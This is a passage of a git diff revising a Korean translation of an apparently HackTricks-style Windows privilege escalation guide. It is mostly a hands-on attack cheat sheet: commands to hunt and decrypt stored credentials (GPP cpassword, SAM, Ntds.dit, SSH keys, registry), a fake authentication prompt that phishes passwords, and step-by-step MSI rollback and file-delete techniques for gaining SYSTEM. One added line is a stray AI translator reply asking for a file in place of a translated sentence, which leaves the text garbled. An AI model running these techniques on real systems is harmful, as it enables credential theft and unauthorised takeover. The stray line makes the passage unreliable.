(GPOs)는 어떤 도메인 사용자라도 접근할 수 있었습니다. 둘째, 공개적으로 문서화된 기본 키를 사용해 AES256으로 암호화된 이러한 GPP 내의 비밀번호는 인증된 사용자라면 누구나 복호화할 수 있었습니다. 이는 사용자가 권한 상승을 할 수 있게 하는 심각한 위험을 초래했습니다. -Search in `C:\ProgramData\Microsoft\Group Policy\history` or in _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (previous to W Vista)_ for these files: +이 위험을 완화하기 위해, 비어 있지 않은 "cpassword" 필드를 포함한 로컬에 캐시된 GPP 파일을 검색하는 함수가 개발되었습니다. 해당 파일을 찾으면 이 함수는 비밀번호를 복호화하고 커스텀 PowerShell 객체를 반환합니다. 이 객체에는 GPP에 관한 정보와 파일의 위치가 포함되어 있어 이 보안 취약점을 식별하고 수정하는 데 도움이 됩니다. + +`C:\ProgramData\Microsoft\Group Policy\history` 또는 _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (Windows Vista 이전)_ 경로에서 다음 파일들을 검색하세요: - Groups.xml - Services.xml @@ -1044,11 +1071,11 @@ Search in `C:\ProgramData\Microsoft\Group Policy\history` or in _**C:\Documents #To decrypt these passwords you can decrypt it using gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw ``` -crackmapexec을 사용하여 passwords를 얻기: +crackmapexec을 사용하여 비밀번호를 얻기: ```bash crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin ``` -### IIS Web 구성 +### IIS 웹 구성 ```bash Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue ``` @@ -1062,7 +1089,7 @@ C:\inetpub\wwwroot\web.config Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue ``` -자격 증명이 포함된 web.config 예시: +자격 증명이 포함된 web.config 예: ```xml @@ -1072,7 +1099,7 @@ Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction ``` -### OpenVPN 자격 증명 +### OpenVPN 인증 정보 ```csharp Add-Type -AssemblyName System.Security $keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs" @@ -1102,7 +1129,7 @@ Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAct ``` ### credentials 요청 -그가 알 수 있을 것 같다고 생각되면 항상 **사용자에게 자신의 credentials 또는 심지어 다른 사용자의 credentials를 입력하도록 요청할 수 있습니다** (주의: 클라이언트에게 직접 **요청**하여 **credentials**를 요구하는 것은 정말 **위험**합니다): +그가 알고 있을 것 같다면 언제든지 **사용자에게 자신의 credentials 또는 다른 사용자의 credentials를 입력하도록 요청할 수 있습니다** (직접 client에게 **credentials**를 **요청하는** 것은 정말 **위험**하다는 점에 유의하세요): ```bash $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password @@ -1110,9 +1137,9 @@ $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::U #Get plaintext $cred.GetNetworkCredential() | fl ``` -### **credentials를 포함할 가능성이 있는 파일명** +### **credentials를 포함할 수 있는 가능한 파일 이름들** -과거에 **passwords**가 **clear-text** 또는 **Base64**로 포함되어 있었던 알려진 파일들 +과거에 **passwords**가 **clear-text** 또는 **Base64**로 포함되어 있던 것으로 알려진 파일들 ```bash $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history vnc.ini, ultravnc.ini, *vnc* @@ -1176,7 +1203,7 @@ TypedURLs #IE %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat ``` -제안된 모든 파일을 검색: +I don't have access to your repository. Please paste the contents of src/windows-hardening/windows-local-privilege-escalation/README.md (or the list of files you want translated). I'll translate the relevant English text to Korean, preserving all markdown/html/tags/paths as requested. ``` cd C:\ dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll" @@ -1187,13 +1214,13 @@ Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAct ``` ### 휴지통의 자격 증명 -휴지통도 확인하여 그 안에 자격 증명이 있는지 확인하세요 +자격 증명이 들어있는지 확인하려면 휴지통도 확인해야 합니다 여러 프로그램에 저장된 **비밀번호를 복구**하려면 다음을 사용할 수 있습니다: [http://www.nirsoft.net/password_recovery_tools.html](http://www.nirsoft.net/password_recovery_tools.html) ### 레지스트리 내부 -**자격 증명을 포함할 수 있는 기타 레지스트리 키** +**자격 증명이 포함될 수 있는 다른 레지스트리 키들** ```bash reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s @@ -1204,8 +1231,8 @@ reg query "HKCU\Software\OpenSSH\Agent\Key" ### 브라우저 기록 -**Chrome** 또는 **Firefox**에 비밀번호가 저장된 db를 확인해야 합니다. -또한 브라우저의 히스토리, 북마크 및 즐겨찾기도 확인하세요 — 그곳에 비밀번호가 저장되어 있을 수 있습니다. +비밀번호가 저장된 **Chrome 또는 Firefox**의 db를 확인해야 합니다.\ +또한 브라우저의 히스토리, 북마크, 즐겨찾기를 확인하세요 — 일부 **비밀번호가** 거기 저장되어 있을 수 있습니다. 브라우저에서 비밀번호를 추출하는 도구: @@ -1214,26 +1241,26 @@ reg query "HKCU\Software\OpenSSH\Agent\Key" - [**SharpChromium**](https://github.com/djhohnstein/SharpChromium) - [**SharpDPAPI**](https://github.com/GhostPack/SharpDPAPI) -### **COM DLL Overwriting** +### **COM DLL 덮어쓰기** -**Component Object Model (COM)**은 Windows 운영체제에 내장된 기술로, 서로 다른 언어로 작성된 소프트웨어 컴포넌트 간의 **intercommunication**을 가능하게 합니다. 각 COM 컴포넌트는 **identified via a class ID (CLSID)**로 식별되며, 각 컴포넌트는 하나 이상의 인터페이스를 통해 기능을 노출하고, 이러한 인터페이스는 interface IDs (IIDs)로 식별됩니다. +**Component Object Model (COM)**은 서로 다른 언어로 작성된 소프트웨어 구성요소 간의 **상호 통신**을 허용하는 Windows 운영체제 내장 기술입니다. 각 COM 구성요소는 **class ID (CLSID)**로 식별되며, 각 구성요소는 하나 이상의 인터페이스를 통해 기능을 노출하고, 이들 인터페이스는 interface ID (IIDs)로 식별됩니다. -COM 클래스와 인터페이스는 레지스트리의 **HKEY\CLASSES\ROOT\CLSID** 및 **HKEY\CLASSES\ROOT\Interface** 아래에 정의되어 있습니다. 이 레지스트리는 **HKEY\LOCAL\MACHINE\Software\Classes** + **HKEY\CURRENT\USER\Software\Classes** 를 병합하여 생성된 **HKEY\CLASSES\ROOT** 입니다. +COM 클래스와 인터페이스는 레지스트리의 **HKEY\CLASSES\ROOT\CLSID** 및 **HKEY\CLASSES\ROOT\Interface** 아래에 정의됩니다. 이 레지스트리는 **HKEY\LOCAL\MACHINE\Software\Classes** + **HKEY\CURRENT\USER\Software\Classes** 를 병합하여 생성된 **HKEY\CLASSES\ROOT** 입니다. -Inside the CLSIDs of this registry you can find the child registry **InProcServer32** which contains a **default value** pointing to a **DLL** and a value called **ThreadingModel** that can be **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single or Multi) or **Neutral** (Thread Neutral). +이 레지스트리의 CLSID 안에는 **InProcServer32**라는 자식 레지스트리가 있으며, 여기에는 **DLL**을 가리키는 **기본값**과 **ThreadingModel**이라는 값이 있습니다. ThreadingModel은 **Apartment** (단일 스레드), **Free** (다중 스레드), **Both** (단일 또는 다중) 또는 **Neutral** (스레드 중립)일 수 있습니다. ![](<../../images/image (729).png>) -기본적으로, 실행될 어떤 DLL이라도 **overwrite any of the DLLs**할 수 있다면, 그 DLL이 다른 사용자에 의해 실행될 경우 **escalate privileges**할 수 있습니다. +기본적으로, 실행될 수 있는 **DLL들 중 어떤 것을 덮어쓸 수 있다면**, 해당 DLL이 다른 사용자에 의해 실행될 경우 **권한 상승**이 가능할 수 있습니다. -To learn how attackers use COM Hijacking as a persistence mechanism check: +공격자가 COM Hijacking을 지속성 메커니즘으로 사용하는 방법을 알아보려면 다음을 확인하세요: {{#ref}} com-hijacking.md {{#endref}} -### 일반적인 파일 및 레지스트리 내 비밀번호 검색 +### **파일 및 레지스트리에서의 일반적인 비밀번호 검색** **파일 내용 검색** ```bash @@ -1241,13 +1268,13 @@ cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt findstr /si password *.xml *.ini *.txt *.config findstr /spin "password" *.* ``` -**특정 파일 이름으로 파일 검색** +**특정 파일 이름을 가진 파일 검색** ```bash dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* where /R C:\ user.txt where /R C:\ *.ini ``` -**레지스트리에서 키 이름 및 암호 검색** +**레지스트리에서 키 이름과 비밀번호 검색** ```bash REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K @@ -1256,11 +1283,11 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /d ``` ### 비밀번호를 검색하는 도구 -[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **msf 플러그인입니다.** 제가 만든 이 플러그인은 피해자 시스템 내부에서 자격 증명을 검색하는 모든 metasploit POST 모듈을 자동으로 실행합니다.\ +[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **는 msf** 플러그인으로, 이 플러그인은 **credentials를 검색하는 모든 metasploit POST 모듈을 자동으로 실행**하도록 만들어졌습니다.\ [**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) 이 페이지에 언급된 비밀번호가 포함된 모든 파일을 자동으로 검색합니다.\ -[**Lazagne**](https://github.com/AlessandroZ/LaZagne) 은 시스템에서 비밀번호를 추출하는 또 다른 훌륭한 도구입니다. +[**Lazagne**](https://github.com/AlessandroZ/LaZagne) 는 시스템에서 비밀번호를 추출하는 또 다른 훌륭한 도구입니다. -도구 [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) 는 이러한 데이터를 평문으로 저장하는 여러 도구에서 **sessions**, **usernames** 및 **passwords** 를 검색합니다 (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP) +도구 [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher)는 이 데이터를 평문으로 저장하는 여러 도구(PuTTY, WinSCP, FileZilla, SuperPuTTY, 그리고 RDP)의 **sessions**, **usernames** 및 **passwords**를 검색합니다. ```bash Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -Thorough @@ -1269,30 +1296,30 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss ``` ## Leaked Handlers -Imagine that **a process running as SYSTEM open a new process** (`OpenProcess()`) with **full access**. The same process **also create a new process** (`CreateProcess()`) **with low privileges but inheriting all the open handles of the main process**.\ -Then, if you have **full access to the low privileged process**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.\ +예를 들어 **SYSTEM 권한으로 실행 중인 프로세스가 새 프로세스를 연다** (`OpenProcess()`)고 가정해보자. 같은 프로세스는 **권한이 낮지만 메인 프로세스의 모든 열린 핸들을 상속받는 새 프로세스를 생성할 수도 있다** (`CreateProcess()`).\ +그런 다음, 만약 당신이 **권한이 낮은 프로세스에 대해 full access를 가지고 있다면**, `OpenProcess()`로 생성된 특권 프로세스에 대한 **열린 핸들을 획득하여 shellcode를 주입할 수 있다**.\ [Read this example for more information about **how to detect and exploit this vulnerability**.](leaked-handle-exploitation.md)\ [Read this **other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access)**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/). ## Named Pipe Client Impersonation -Shared memory segments, referred to as pipes, enable process communication and data transfer. +Shared memory segments, referred to as **pipes**, enable process communication and data transfer. -Windows provides a feature called Named Pipes, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as **named pipe server** and **named pipe client**. +Windows provides a feature called **Named Pipes**, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as **named pipe server** and **named pipe client**. When data is sent through a pipe by a **client**, the **server** that set up the pipe has the ability to **take on the identity** of the **client**, assuming it has the necessary **SeImpersonate** rights. Identifying a **privileged process** that communicates via a pipe you can mimic provides an opportunity to **gain higher privileges** by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found [**here**](named-pipe-client-impersonation.md) and [**here**](#from-high-integrity-to-system). -Also the following tool allows to **intercept a named pipe communication with a tool like burp:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **and this tool allows to list and see all the pipes to find privescs** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer) +또한 다음 도구는 **burp 같은 툴로 named pipe 통신을 가로채는 것**을 허용한다: [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **그리고 이 도구는 모든 파이프를 나열하고 확인하여 privescs를 찾을 수 있게 해준다** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer) ## 기타 -### Windows에서 실행을 유발할 수 있는 파일 확장자 +### Windows에서 실행될 수 있는 파일 확장자 -Check out the page [https://filesec.io/](https://filesec.io/) +다음 페이지를 확인하세요 **[https://filesec.io/](https://filesec.io/)** ### **명령줄에서 비밀번호 모니터링** -사용자 권한으로 shell을 얻었을 때, 예약된 작업이나 다른 프로세스가 명령줄에 자격 증명을 전달하며 실행될 수 있다. 아래 스크립트는 프로세스의 명령줄을 2초마다 캡처하고 현재 상태를 이전 상태와 비교하여 차이점을 출력한다. +사용자 권한으로 셸을 얻었을 때, 예약된 작업이나 다른 프로세스가 **명령줄에서 자격 증명을 전달(pass credentials on the command line)**하면서 실행될 수 있다. 아래 스크립트는 프로세스 명령줄을 2초마다 캡처하여 현재 상태를 이전 상태와 비교하고, 차이점을 출력한다. ```bash while($true) { @@ -1302,15 +1329,15 @@ $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine Compare-Object -ReferenceObject $process -DifferenceObject $process2 } ``` -## Stealing passwords from processes +## 프로세스에서 비밀번호 탈취 -## From Low Priv User to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass +## 낮은 권한 사용자에서 NT\AUTHORITY SYSTEM으로 (CVE-2019-1388) / UAC Bypass -그래픽 인터페이스에 접근할 수 있고 (via console or RDP) UAC가 활성화되어 있는 경우, 일부 Microsoft Windows 버전에서는 권한이 없는 사용자로부터 "NT\AUTHORITY SYSTEM"과 같은 터미널이나 다른 프로세스를 실행할 수 있습니다. +그래픽 인터페이스(콘솔 또는 RDP를 통해)에 접근할 수 있고 UAC가 활성화되어 있으면, 일부 Microsoft Windows 버전에서는 권한이 없는 사용자로부터 터미널이나 "NT\AUTHORITY SYSTEM"과 같은 다른 프로세스를 실행할 수 있습니다. -이로 인해 동일한 취약점을 이용해 권한을 상승시키고 동시에 UAC를 우회할 수 있습니다. 또한 어떤 것도 설치할 필요가 없으며, 프로세스 중에 사용되는 binary는 Microsoft에서 서명하고 발급한 것입니다. +이로 인해 동일한 취약점을 이용해 권한 상승과 UAC 우회를 동시에 수행할 수 있습니다. 또한 별도로 무엇을 설치할 필요가 없고, 이 과정에서 사용되는 바이너리는 Microsoft에 의해 서명되고 발급됩니다. -Some of the affected systems are the following: +영향을 받는 시스템 중 일부는 다음과 같습니다: ``` SERVER ====== @@ -1356,14 +1383,14 @@ https://github.com/jas502n/CVE-2019-1388 ## From Administrator Medium to High Integrity Level / UAC Bypass -Integrity Levels에 대해 **학습하려면** 다음을 읽으세요: +다음 문서를 읽어 **Integrity Levels에 대해 학습**하세요: {{#ref}} integrity-levels.md {{#endref}} -그런 다음 **UAC 및 UAC bypass에 대해 학습하려면** 다음을 읽으세요: +그런 다음 **UAC 및 UAC bypasses에 대해 학습하려면 다음을 읽으세요:** {{#ref}} @@ -1372,129 +1399,129 @@ integrity-levels.md ## From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP -기법은 [**in this blog post**](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) 에 설명되어 있으며, 익스플로잇 코드는 [**available here**](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs) 에 있습니다. +The technique described [**in this blog post**](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) with a exploit code [**available here**](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs). -공격은 기본적으로 Windows Installer의 rollback 기능을 악용하여 제거(uninstallation) 과정 중 정당한 파일을 악성 파일로 교체하는 것입니다. 이를 위해 공격자는 `C:\Config.Msi` 폴더를 하이재킹하는 데 사용될 **malicious MSI installer** 를 만들어야 하며, 이 폴더는 이후 다른 MSI 패키지의 제거 과정에서 rollback 파일을 저장하는 데 Windows Installer가 사용하게 됩니다. 이 rollback 파일들이 악성 페이로드를 포함하도록 수정됩니다. +이 공격은 기본적으로 Windows Installer의 rollback 기능을 악용하여 제거 과정에서 정당한 파일을 악의적인 파일로 교체하는 방식입니다. 이를 위해 공격자는 나중에 Windows Installer가 다른 MSI 패키지의 제거 시 rollback 파일을 저장하는 데 사용하는 `C:\Config.Msi` 폴더를 하이재크하기 위한 **malicious MSI installer**를 만들어야 합니다. 이 rollback 파일들은 악성 페이로드로 수정되어 저장됩니다. 요약된 기법은 다음과 같습니다: 1. **Stage 1 – Preparing for the Hijack (leave `C:\Config.Msi` empty)** - Step 1: Install the MSI -- Writable 폴더(`TARGETDIR`)에 무해한 파일(예: `dummy.txt`)을 설치하는 `.msi`를 만듭니다. -- 설치 프로그램을 **"UAC Compliant"** 로 표시하여 **non-admin user**가 실행할 수 있게 합니다. -- 설치 후 파일에 대한 **handle** 을 열어 둡니다. +- 쓰기 가능한 폴더(`TARGETDIR`)에 무해한 파일(예: `dummy.txt`)을 설치하는 `.msi`를 만듭니다. +- 인스톨러를 **"UAC Compliant"**로 표시하여 **비관리자 사용자**도 실행할 수 있게 합니다. +- 설치 후 파일에 대한 **handle**을 열어 둡니다. - Step 2: Begin Uninstall -- 같은 `.msi`를 제거(uninstall)합니다. -- 제거 과정에서 파일들이 `C:\Config.Msi`로 이동하고 `.rbf` 파일(rollback 백업)로 이름이 변경됩니다. -- 파일이 `C:\Config.Msi\.rbf`가 될 때를 감지하기 위해 `GetFinalPathNameByHandle`을 사용해 **open file handle을 폴링**합니다. +- 동일한 `.msi`를 제거합니다. +- 제거 과정에서 파일들이 `C:\Config.Msi`로 이동되고 `.rbf` 파일(rollback 백업)으로 이름이 변경됩니다. +- 파일이 `C:\Config.Msi\.rbf`가 되었는지 감지하기 위해 `GetFinalPathNameByHandle`를 사용해 **열려 있는 파일 핸들 폴링**을 수행합니다. - Step 3: Custom Syncing -- `.msi`에는 다음과 같은 **custom uninstall action (`SyncOnRbfWritten`)** 이 포함되어 있습니다: -- `.rbf`가 쓰여졌을 때 신호를 보냄. -- 그런 다음 제거를 계속하기 전에 다른 이벤트를 **대기**함. +- `.msi`에는 다음을 수행하는 **custom uninstall action (`SyncOnRbfWritten`)**이 포함됩니다: +- `.rbf`가 기록되었을 때 신호를 보냅니다. +- 그런 다음 제거를 계속하기 전에 다른 이벤트를 **대기**합니다. - Step 4: Block Deletion of `.rbf` -- 신호를 받으면 `FILE_SHARE_DELETE` 없이 **`.rbf` 파일을 엽니다** — 이렇게 하면 해당 파일을 **삭제할 수 없게 됩니다**. -- 그런 다음 제거가 끝나도록 **반대 신호**를 보냅니다. -- Windows Installer가 `.rbf`를 삭제하지 못하고, 모든 내용을 삭제할 수 없기 때문에 **`C:\Config.Msi`가 제거되지 않습니다**. +- 신호를 받으면 `FILE_SHARE_DELETE` 없이 **`.rbf` 파일을 엽니다** — 이는 해당 파일이 삭제되는 것을 **방지**합니다. +- 그런 다음 제거가 완료되도록 **신호를 다시 보냅니다**. +- Windows Installer는 `.rbf`를 삭제하지 못하고 모든 내용을 삭제하지 못하므로 **`C:\Config.Msi`는 제거되지 않습니다**. - Step 5: Manually Delete `.rbf` -- 공격자(당신)가 `.rbf` 파일을 수동으로 삭제합니다. -- 이제 **`C:\Config.Msi`가 비어있게 되어** 하이재킹할 준비가 됩니다. +- 공격자는 `.rbf` 파일을 수동으로 삭제합니다. +- 이제 **`C:\Config.Msi`가 비어 있으며**, 하이재크할 준비가 된 상태입니다. -> 이 시점에서, `C:\Config.Msi`를 삭제하기 위해 **SYSTEM-level arbitrary folder delete vulnerability** 를 트리거하세요. +> 이 시점에서, **SYSTEM-level arbitrary folder delete vulnerability**를 트리거하여 `C:\Config.Msi`를 삭제하세요. 2. **Stage 2 – Replacing Rollback Scripts with Malicious Ones** - Step 6: Recreate `C:\Config.Msi` with Weak ACLs -- 스스로 `C:\Config.Msi` 폴더를 재생성합니다. -- **weak DACLs**(예: Everyone:F)를 설정하고 `WRITE_DAC` 권한으로 **handle을 열어 둡니다**. +- `C:\Config.Msi` 폴더를 직접 다시 만듭니다. +- **약한 DACL**(예: Everyone:F)을 설정하고, `WRITE_DAC` 권한으로 **핸들을 열어 둡니다**. - Step 7: Run Another Install -- 다음 옵션으로 `.msi`를 다시 설치합니다: +- 다음과 함께 `.msi`를 다시 설치합니다: - `TARGETDIR`: 쓰기 가능한 위치. - `ERROROUT`: 강제 실패를 유발하는 변수. -- 이 설치는 다시 **rollback** 을 트리거하는 데 사용되며, rollback은 `.rbs`와 `.rbf`를 읽습니다. +- 이 설치는 다시 **rollback**을 트리거하는 데 사용되며, 이때 `.rbs`와 `.rbf`를 읽습니다. - Step 8: Monitor for `.rbs` -- `ReadDirectoryChangesW`를 사용해 `C:\Config.Msi`를 모니터링하여 새로운 `.rbs`가 나타날 때까지 기다립니다. -- 그 파일 이름을 캡처합니다. +- `ReadDirectoryChangesW`를 사용하여 `C:\Config.Msi`에서 새 `.rbs`가 나타날 때까지 모니터링합니다. +- 해당 파일 이름을 캡처합니다. - Step 9: Sync Before Rollback -- `.msi`에는 다음과 같은 **custom install action (`SyncBeforeRollback`)** 이 포함되어 있습니다: -- `.rbs`가 생성될 때 이벤트를 신호로 보냄. -- 그런 다음 계속하기 전에 **대기**함. +- `.msi`에는 다음을 수행하는 **custom install action (`SyncBeforeRollback`)**이 포함됩니다: +- `.rbs`가 생성되면 이벤트를 신호합니다. +- 그런 다음 계속하기 전에 **대기**합니다. - Step 10: Reapply Weak ACL -- `.rbs created` 이벤트를 받으면: -- Windows Installer는 `C:\Config.Msi`에 대해 **강한 ACL을 재적용**합니다. -- 그러나 `WRITE_DAC` 권한의 handle을 여전히 가지고 있으므로 다시 **weak ACL을 재적용**할 수 있습니다. +- `.rbs created` 이벤트를 받은 후: +- Windows Installer는 `C:\Config.Msi`에 **강한 ACL을 재적용**합니다. +- 그러나 당신은 여전히 `WRITE_DAC` 핸들을 가지고 있으므로 다시 **약한 ACL을 재적용**할 수 있습니다. -> ACL은 **handle을 열 때만 적용**되므로 여전히 폴더에 쓸 수 있습니다. +> ACL은 **핸들을 열 때만 적용**되므로 폴더에 계속 쓸 수 있습니다. - Step 11: Drop Fake `.rbs` and `.rbf` -- `.rbs` 파일을 덮어써서 Windows에게 다음을 지시하는 **fake rollback script** 를 만듭니다: -- 당신의 `.rbf` 파일(악성 DLL)을 **privileged location**(예: `C:\Program Files\Common Files\microsoft shared\ink\HID.DLL`)으로 복원하라고 지시. -- SYSTEM 수준 페이로드 DLL을 포함한 **fake `.rbf`** 를 배치. +- `.rbs` 파일을 **가짜 rollback 스크립트**로 덮어써서 Windows에게 다음을 지시합니다: +- 당신의 `.rbf` 파일(악성 DLL)을 **권한 있는 위치**(예: `C:\Program Files\Common Files\microsoft shared\ink\HID.DLL`)으로 복원하도록. +- SYSTEM 수준의 페이로드 DLL을 포함하는 가짜 `.rbf`를 떨어뜨립니다. - Step 12: Trigger the Rollback -- 동기화 이벤트에 신호를 보내 설치가 재개되도록 합니다. -- 알려진 지점에서 설치를 **의도적으로 실패**시키도록 **type 19 custom action (`ErrorOut`)** 를 구성합니다. +- 동기화 이벤트에 신호를 보내 설치가 재개되게 합니다. +- 알려진 지점에서 설치를 **의도적으로 실패**시키도록 **type 19 custom action (`ErrorOut`)**가 구성되어 있습니다. - 이로 인해 **rollback이 시작**됩니다. - Step 13: SYSTEM Installs Your DLL - Windows Installer는: - 당신의 악성 `.rbs`를 읽고, -- 대상 위치로 당신의 `.rbf` DLL을 복사합니다. -- 이제 **SYSTEM이 로드하는 경로에 악성 DLL이 놓이게** 됩니다. +- `.rbf` DLL을 대상 위치로 복사합니다. +- 이제 **SYSTEM이 로드하는 경로에 악성 DLL이 놓이게 됩니다**. - Final Step: Execute SYSTEM Code -- 해당 DLL을 로드하는 신뢰된 **auto-elevated binary**(예: `osk.exe`)를 실행합니다. -- **Boom**: 당신의 코드가 **as SYSTEM** 으로 실행됩니다. +- 당신이 하이재크한 DLL을 로드하는 신뢰된 **auto-elevated binary**(예: `osk.exe`)를 실행합니다. +- **Boom**: 당신의 코드는 **SYSTEM로 실행**됩니다. ### From Arbitrary File Delete/Move/Rename to SYSTEM EoP -메인 MSI rollback 기법(앞서 설명한)은 전체 폴더(예: `C:\Config.Msi`)를 삭제할 수 있다고 가정합니다. 하지만 취약점이 **임의의 파일 삭제(arbitrary file deletion)**만 허용한다면 어떻게 할까요? +주된 MSI rollback 기법(위의 것)은 전체 폴더(예: `C:\Config.Msi`)를 삭제할 수 있다고 가정합니다. 하지만 취약점이 **임의 파일 삭제**만 허용한다면 어떻게 할까요? -NTFS 내부구조를 악용할 수 있습니다: 모든 폴더에는 다음과 같은 숨겨진 alternate data stream이 존재합니다: +당신은 **NTFS internals**를 악용할 수 있습니다: 모든 폴더에는 다음과 같은 숨겨진 alternate data stream이 있습니다: ``` C:\SomeFolder::$INDEX_ALLOCATION ``` 이 스트림은 폴더의 **인덱스 메타데이터**를 저장합니다. -따라서 폴더의 **`::$INDEX_ALLOCATION` 스트림을 삭제하면**, NTFS는 파일 시스템에서 해당 폴더를 **완전히 제거합니다**. +따라서, **폴더의 `::$INDEX_ALLOCATION` 스트림을 삭제하면**, NTFS는 파일 시스템에서 **폴더 전체를 제거합니다**. -다음과 같은 표준 파일 삭제 API를 사용하여 이 작업을 수행할 수 있습니다: +이 작업은 다음과 같은 표준 파일 삭제 API를 사용하여 수행할 수 있습니다: ```c DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION"); ``` -> 비록 당신이 *file* delete API를 호출하고 있지만, 그것은 **폴더 자체를 삭제합니다**. +> *file* delete API를 호출하고 있음에도 불구하고, 그것은 **폴더 자체를 삭제합니다**. ### 폴더 내용 삭제에서 SYSTEM EoP로 -primitive가 임의의 파일/폴더를 삭제할 수는 없지만, 공격자가 제어하는 폴더의 *contents*를 **삭제할 수 있다면 어떨까요?** +만약 당신의 primitive가 임의의 파일/폴더를 삭제할 수는 없지만, 공격자가 제어하는 폴더의 *contents*를 삭제하는 것은 **허용한다면**? -1. Step 1: 미끼 폴더와 파일 설정 +1. Step 1: Setup a bait folder and file - Create: `C:\temp\folder1` - Inside it: `C:\temp\folder1\file1.txt` 2. Step 2: Place an **oplock** on `file1.txt` -- The oplock **pauses execution** when a privileged process tries to delete `file1.txt`. +- oplock는 특권 프로세스가 `file1.txt`를 삭제하려 할 때 **실행을 일시중지**합니다. ```c // pseudo-code RequestOplock("C:\\temp\\folder1\\file1.txt"); WaitForDeleteToTriggerOplock(); ``` 3. 3단계: SYSTEM 프로세스 트리거(예: `SilentCleanup`) -- 이 프로세스는 폴더(예: `%TEMP%`)를 스캔하고 해당 내용물을 삭제하려고 시도합니다. -- `file1.txt`에 도달하면 **oplock triggers** 되어 제어가 당신의 callback으로 넘어갑니다. +- 이 프로세스는 폴더(예: `%TEMP%`)를 스캔하고 그 안의 내용을 삭제하려고 시도합니다. +- 이 프로세스가 `file1.txt`에 도달하면 **oplock triggers**가 발생하여 제어가 콜백으로 넘어갑니다. -4. 4단계: oplock callback 내부 – 삭제 리디렉션 +4. 4단계: oplock 콜백 내부 – 삭제를 리다이렉트 -- 옵션 A: `file1.txt`를 다른 곳으로 이동 -- 이렇게 하면 oplock을 깨지 않고 `folder1`이 비워집니다. +- 옵션 A: `file1.txt`을 다른 곳으로 이동 +- 이렇게 하면 oplock을 깨뜨리지 않고 `folder1`을 비울 수 있습니다. - `file1.txt`를 직접 삭제하지 마세요 — 그러면 oplock이 조기에 해제됩니다. - 옵션 B: `folder1`을 